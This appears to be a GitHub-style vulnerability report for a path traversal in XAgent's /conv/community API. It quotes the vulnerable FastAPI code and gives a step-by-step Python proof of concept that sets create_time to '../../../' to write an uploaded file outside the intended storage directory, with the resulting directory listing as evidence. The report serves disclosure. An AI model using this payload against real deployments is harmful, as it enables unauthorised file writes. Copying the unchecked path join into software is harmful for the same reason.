Path Traversal in /conv/community api #415
Description
A path traversal vulnerability in /conv/community api.
@router.post("/community")
def community(user_id: str = Depends(user_is_available),
user_name: str = Form(...),
interaction: str = Form(...),
raws: str = Form(...),
files: UploadFile = File(...),
db: Session = Depends(get_db)):
"""
community, this api is runing on x-agent.net
"""
interaction = json.loads(interaction)
raws = json.loads(raws)
interaction_id = interaction["interaction_id"]
old_share = InteractionCRUD.get_shared_interaction(
db=db, interaction_id=interaction_id)
# 如果已经分享过了,就不再分享了
if old_share:
raise XAgentWebError("interaction is exist!")
contain_finish = False
for raw in raws:
if raw["status"] == StatusEnum.FINISHED:
contain_finish = True
break
# 如果没有finish的节点,就不分享了
if not contain_finish:
raise XAgentWebError("interaction is not finish!")
interaction_dir = os.path.join(XAgentServerEnv.base_dir,
"localstorage",
"interact_records",
interaction["create_time"][:10], # this can be control by attacker and no other check
interaction_id,
"workspace")reproduce:
- first create a user
url = 'http://localhost:8090'
user = {
"email": "xxxxx@outlook.com",
"name": "admin",
"corporation": "xx",
"position": "xx",
"industry": "xx"
}
rep = requests.post(url=f'{url}/user/register', data=user)
print(rep.text)
'''
{"data":{"user_id":"8d10b6d4f3724f7cb684439644a2a4be","email":"xxxxx@outlook.com","name":"admin","token":"2e4f5d9d1e5248acba5dbde93b212811","available":true,"corporation":"xx","position":"xx","industry":"xx","create_time":"2025-05-09 17:32:56","update_time":"2025-05-09 17:32:56","is_beta":false},"success":true,"message":"Register success, we will send a email to you!"}
'''- create a interaction
data = {
"user_id": "8d10b6d4f3724f7cb684439644a2a4be",
"token": "2e4f5d9d1e5248acba5dbde93b212811"
}
req = requests.post(url=f'{url}/conv/init_conv_env', data=data)
print(req.text)
'''
{"data":{"id":"cdcdf752dfba4a0eb689a95a94ff57c6","t":"1746783460326"},"success":true,"message":"success"}
'''- call /conv/community api
interaction = {
"interaction_id": "cdcdf752dfba4a0eb689a95a94ff57c6",
"create_time": "../../../"
}
raws = [
{
"status": "finished"
}
]
data = {
"user_id": "8d10b6d4f3724f7cb684439644a2a4be",
"token": "2e4f5d9d1e5248acba5dbde93b212811",
"user_name": "admin",
"interaction": json.dumps(interaction),
"raws": json.dumps(raws)
}
files = {
'files': open('./hook.js', 'rb')
}
rep = requests.post(url=f'{url}/conv/community', data=data, files=files)result:
The expected path to be saved is in XAgentServer/local storage/interact_decords, but now it is saved to XAgent.
PS C:\AI\Agent\XAgent> ls
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 2025/5/9 16:27 .github
d----- 2025/5/9 16:27 assets
d----- 2025/5/9 17:39 cdcdf752dfba4a0eb689a95a94ff57c6 # [!] here
d----- 2025/5/9 16:27 dockerfiles
d----- 2025/5/9 16:27 local_workspace
d----- 2025/5/9 17:11 logs
d----- 2025/5/9 16:27 Markdown_Docs
d----- 2025/5/9 17:23 running_records
d----- 2025/5/9 16:27 tests
d----- 2025/5/9 16:27 ToolServer
d----- 2025/5/9 17:11 XAgent
d----- 2025/5/9 16:27 XAgentGen
d----- 2025/5/9 17:11 XAgentServer
d----- 2025/5/9 16:27 XAgentWeb
-a---- 2025/5/9 16:27 94 .env
-a---- 2025/5/9 16:27 627 .gitignore
-a---- 2025/5/9 16:27 1844943 .project_hierarchy.json
-a---- 2025/5/9 16:27 1074 build_images.sh
-a---- 2025/5/9 16:27 2117 CHANGELOG.md
-a---- 2025/5/9 16:27 5377 CODE_OF_CONDUCT.md
-a---- 2025/5/9 16:27 12557 command.py
-a---- 2025/5/9 16:27 5362 command_input.py
-a---- 2025/5/9 16:27 2204 CONTRIBUTING.md
-a---- 2025/5/9 16:27 2785 docker-compose.yml
-a---- 2025/5/9 16:27 11538 LICENSE
-a---- 2025/5/9 16:27 12346 README.md
-a---- 2025/5/9 16:27 15824 README_JA.md
-a---- 2025/5/9 16:27 10603 README_ZH.md
-a---- 2025/5/9 16:27 330 requirements.txt
-a---- 2025/5/9 16:27 4213 run.py
-a---- 2025/5/9 16:27 197 setup.py
-a---- 2025/5/9 16:27 425 start_server.py